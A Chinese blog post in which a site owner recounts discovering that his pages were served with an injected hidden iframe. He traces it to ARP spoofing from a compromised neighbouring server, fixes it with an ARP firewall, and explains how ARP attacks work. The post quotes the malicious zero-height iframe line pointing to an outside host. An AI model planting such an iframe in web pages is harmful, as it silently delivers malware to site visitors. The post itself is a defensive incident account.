今天凌晨一打開自己的網站，卡巴就彈出來說有病毒，報告為“惡意程序 Exploit.Win32.IMG-ANI.k 文件: F:\Documents and Settings\*****\Local Settings\Temporary Internet Files\Content.IE5\DF7VHPOE\love[1].jpg”，然后網頁顯示的也有問題，最上方居然裸露出來了一小段源碼，于是馬上查看源碼，發現代碼居然被改了.

最上面變成了：

〈IFRAME height=0 src="httP://web.21575.com/113/" width=150〉〈/IFRAME〉

我的第一反應就是網站被人掛馬了，首先想到的是不是程序有漏洞，被人傳了木馬，趕緊用FTP連上，檢查ASP文件，發現所有的ASP文件都沒有是今天修改過的，模板系統也沒有問題，這下我真的不知道怎么辦了。都搞不清楚問題出在哪里。。。
然后我對掛馬的這個網站來了興趣，在百度里一搜“21575”，

發現有一條的結果的標題是“服務器被ARP欺騙，大家請不要訪問我的站”，看了一下那條帖子，然后又聯想到昨天下午收到了IDC的短信，提醒說最近ARP病毒泛濫，于是我馬上就想到應該是受到ARP攻擊了。
下午我還去IDC的網站上看了一下，有一篇關于防范ARP攻擊的公告，還提供了ARP防范工具下載，趕緊下了，然后安裝.
　這個軟件是ARP防火墻（Anti ARP Sniffer），下載地址：http://www.antiarp.com/newsopen2.asp?ArticleID=24

官網：http://www.antiarp.com

剛裝上以后ARP防火墻啟動不了，于是重啟服務器，順利啟動了，然后就看到ARP防火墻提示受到ARP攻擊了，還能跟蹤到攻擊的來源IP
裝上ARP防火墻以后，再訪問網站，一切正常.

ARP攻擊的先進性就好比DNS劫持一樣，處于最上層。網頁實際的文件并沒有改變，但是發送給瀏覽器以后就變了樣了，被病毒給改了.

相關知識：

ARP即Address Resolution Protocol，將網絡IP地址映射至網卡硬件MAC地址的協議。一般危害為欺騙同網段內的其他服務器地址，截獲其數據報文、監聽數據傳輸、盜取帳號信息，甚至對來訪數據包進行欺騙和偽造。

該病毒發作方式為：網段內一臺服務器中此病毒，病毒將以此機器作為肉雞，對同網段服務器進行數據劫持和欺騙。類似于奪取同段內的其他服務器的IP，導致合法服務器無法正常通訊。此病毒還可對網關地址進行欺騙，造成此網段所有IP地址都無法正常解析。以致網絡大面積癱瘓。

我這次的情形就是上面說的“對來訪數據包進行欺騙和偽造”、“對同網段服務器進行數據劫持和欺騙”，ARP防火墻查到了攻擊源，是同網段內的一臺機子，我看了一下那臺機子，居然是用IIS的默認站點建的站（可以直接用IP訪問），估計系統漏洞不少，被人攻擊中毒了，然后連累到我們同網段內的其他無辜的用戶。

安全很重要！尤其是在最近病毒木馬泛濫的日子里。

【編輯推薦】

1. 代理ARP 技術(頁1)
2. 專題：ARP攻擊防范與解決方案